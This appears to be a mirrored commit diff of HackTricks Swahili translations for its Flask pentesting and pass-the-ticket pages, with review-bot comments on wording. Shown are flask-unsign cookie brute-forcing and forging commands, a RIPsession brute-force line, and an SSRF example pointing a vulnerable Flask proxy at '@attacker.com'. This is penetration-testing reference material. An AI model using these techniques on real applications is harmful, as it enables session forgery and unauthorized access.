mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 14:40:37 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind
parent
252046b0a8
commit
72dffef4f3
2 changed files with 32 additions and 32 deletions
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
|
@ -10,30 +10,30 @@ Njia nyingine za kusaidia HackTricks:
|
|||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (512).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia mifumo ya kazi** kwa kutumia zana za **jamii za juu zaidi** duniani.\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=flask) kujenga na **kutumia mchakato** kwa urahisi uliosukumwa na zana za **jamii za juu zaidi** duniani.\
|
||||
Pata Ufikiaji Leo:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
|
||||
|
||||
**Labda ikiwa unacheza CTF programu ya Flask itahusiana na** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
|
||||
|
||||
## Vidakuzi
|
||||
## Cookies
|
||||
|
||||
Jina la kikao cha kuki cha chaguo-msingi ni **`session`**.
|
||||
Jina la kikao cha biskuti cha chaguo-msingi ni **`kikao`**.
|
||||
|
||||
### Mchawi
|
||||
|
||||
Dukizi ya mtandaoni ya Flask: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
|
||||
Mchawi wa mtandaoni wa biskuti za Flask: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
|
||||
|
||||
#### Mwongozo
|
||||
|
||||
Pata sehemu ya kwanza ya kuki hadi alama ya kwanza na ikibadilishe kwa Base64>
|
||||
Pata sehemu ya kwanza ya biskuti hadi alama ya kwanza na ikodishe Base64>
|
||||
```bash
|
||||
echo "ImhlbGxvIg" | base64 -d
|
||||
```
|
||||
|
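Review bot: the default session cookie name line now reads **`kikao`** where it read **`session`**; `session` is the literal cookie name Flask uses by default, not a word to translate, so the code-formatted value should stay `session`. The same hunk also mixes "kuki", "biskuti" and "vidakuzi" for the same thing and changes the heading "## Vidakuzi" to "## Cookies"; settle on one term across the section and check any links that point at the old heading.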
@ -41,7 +41,7 @@ Cookie pia inasainiwa kutumia nenosiri
|
|||
|
||||
### **Flask-Unsign**
|
||||
|
||||
Zana ya mstari wa amri kutafuta, kudecode, kufanya nguvu ya kutumia na kutengeneza vidakuzi vya kikao vya programu ya Flask kwa kudhani funguo za siri.
|
||||
Zana ya mstari wa amri ya kupata, kudecode, kufanya nguvu ya kutumia nguvu na kutengeneza vidakuzi vya kikao vya programu ya Flask kwa kudhani funguo za siri.
|
||||
|
||||
{% embed url="https://pypi.org/project/flask-unsign/" %}
|
||||
```bash
|
||||
|
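Review bot: in the Flask-Unsign description the new wording "kufanya nguvu ya kutumia nguvu" repeats "nguvu" and reads as a doubled phrase rather than a clearer rendering of brute-forcing. Either keep the previous line or leave the term "brute-force" untranslated, as the page already does for other tool vocabulary such as "kudecode".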
@ -59,13 +59,13 @@ flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<coo
|
|||
```bash
|
||||
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
|
||||
```
|
||||
#### Kusaini kwa kutumia toleo la zamani (legacy)
|
||||
#### Kusaini kwa kutumia toleo la zamani (la zamani)
|
||||
```bash
|
||||
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
|
||||
```
|
||||
### **RIPsession**
|
||||
|
||||
Chombo cha amri ya mstari wa amri kutumia nguvu kwenye tovuti kutumia vidakuzi vilivyoundwa na flask-unsign.
|
||||
Chombo cha mstari wa amri kutumika kuvunja nguvu tovuti kwa kutumia vidakuzi vilivyoundwa na flask-unsign.
|
||||
|
||||
{% embed url="https://github.com/Tagvi/ripsession" %}
|
||||
```bash
|
||||
|
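Review bot: the heading "#### Kusaini kwa kutumia toleo la zamani (legacy)" becomes "... toleo la zamani (la zamani)", which repeats the same words in the parenthesis and drops the one token that tied the heading to the `--legacy` flag in the command directly below it. Keep "(legacy)" untranslated so the heading still names the option the reader has to type.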
@ -73,11 +73,11 @@ ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s p
|
|||
```
|
||||
### SQLi katika kuki ya kikao cha Flask na SQLmap
|
||||
|
||||
[**Mfano huu**](../../pentesting-web/sql-injection/sqlmap/#eval) hutumia chaguo la `eval` la sqlmap kwa **kiotomatiki kusaini mizigo ya sqlmap** kwa flask kwa kutumia siri inayojulikana.
|
||||
[**Mfano huu**](../../pentesting-web/sql-injection/sqlmap/#eval) hutumia chaguo la `eval` la sqlmap kwa **kiotomatiki kusaini mizigo ya sqlmap** kwa kutumia siri inayojulikana kwa flask.
|
||||
|
||||
## Flask Proxy kwa SSRF
|
||||
|
||||
[**Katika andishi hili**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) imeelezewa jinsi Flask inavyoruhusu ombi linaloanza na herufi "@":
|
||||
[**Katika andishi hili**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) imeelezwa jinsi Flask inavyoruhusu ombi linaloanza na herufi "@":
|
||||
```http
|
||||
GET @/ HTTP/1.1
|
||||
Host: target.com
|
||||
|
@ -98,14 +98,14 @@ return get(f'{SITE_NAME}{path}').content
|
|||
|
||||
app.run(host='0.0.0.0', port=8080)
|
||||
```
|
||||
Inaweza kuruhusu kuingiza kitu kama "@attacker.com" ili kusababisha **SSRF**.
|
||||
Hakikisha kuwezesha kuingiza kitu kama "@attacker.com" ili kusababisha **SSRF**.
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (512).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii za **juu zaidi** ulimwenguni.\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=flask) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii ya **juu zaidi** duniani.\
|
||||
Pata Ufikiaji Leo:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
|
||||
|
||||
<details>
|
||||
|
||||
|
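Review bot: the sentence after the proxy code changes from "Inaweza kuruhusu kuingiza kitu kama "@attacker.com" ..." to "Hakikisha kuwezesha kuingiza kitu kama ...", which turns a description of what the code may allow into an instruction to the reader to enable it. The surrounding text explains a parser behaviour that leads to SSRF, so the descriptive form is the accurate one; suggest reverting this line to the previous wording.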
@ -115,8 +115,8 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,29 +2,29 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia mifumo ya kazi** kwa kutumia zana za **jamii yenye maendeleo zaidi** duniani.\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pass-the-ticket) kujenga na **kutumia mifumo ya kazi** kwa kutumia zana za **jamii za juu zaidi** ulimwenguni.\
|
||||
Pata Ufikiaji Leo:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
|
||||
|
||||
## Pita Tiketi (PTT)
|
||||
|
||||
Katika njia ya udukuzi ya **Pita Tiketi (PTT)**, wadukuzi **wanateka tiketi ya uthibitisho wa mtumiaji** badala ya nywila au thamani za hash. Tiketi hii iliyotekwa hutumiwa kujifanya kuwa mtumiaji, kupata ufikiaji usioruhusiwa kwenye rasilimali na huduma ndani ya mtandao.
|
||||
Katika njia ya kushambulia **Pita Tiketi (PTT)**, wadukuzi **wanateka tiketi ya uthibitisho wa mtumiaji** badala ya nywila au thamani za hash. Tiketi hii iliyotekwa hutumiwa kujifanya kuwa mtumiaji, kupata ufikiaji usioruhusiwa kwenye rasilimali na huduma ndani ya mtandao.
|
||||
|
||||
**Soma**:
|
||||
|
||||
|
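Review bot: the sponsorship bullet in this hunk goes from "MIPANGO YA KUJIUNGA" to "MIPANGO YA USAJILI", while the last hunk of the same file changes the identical bullet from "MIPANGO YA USAJILI" to "MIPANGO YA KUJIUNGA", so the top and bottom copies of the block still disagree after the commit, only swapped. Choose one label and apply it to both copies; the same applies to "za kipekee" versus "ya kipekee" on the NFTs bullet.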
@ -67,21 +67,21 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
|
|||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii ya **juu zaidi** duniani.\
|
||||
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pass-the-ticket) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za **jamii ya juu zaidi** duniani.\
|
||||
Pata Ufikiaji Leo:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
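Review bot: the merchandise bullet here changes "bidhaa rasmi" to "swag rasmi", while the copy of the same bullet at the top of this file is left as "bidhaa rasmi", and the summary line in this hunk keeps "HackTricks AWS Red Team Expert" in English where the top of the file uses "Mtaalam wa Timu Nyekundu ya AWS ya HackTricks". Both blocks are the same boilerplate, so they should carry the same text; a shared glossary for the translation run would stop these from drifting on each sync.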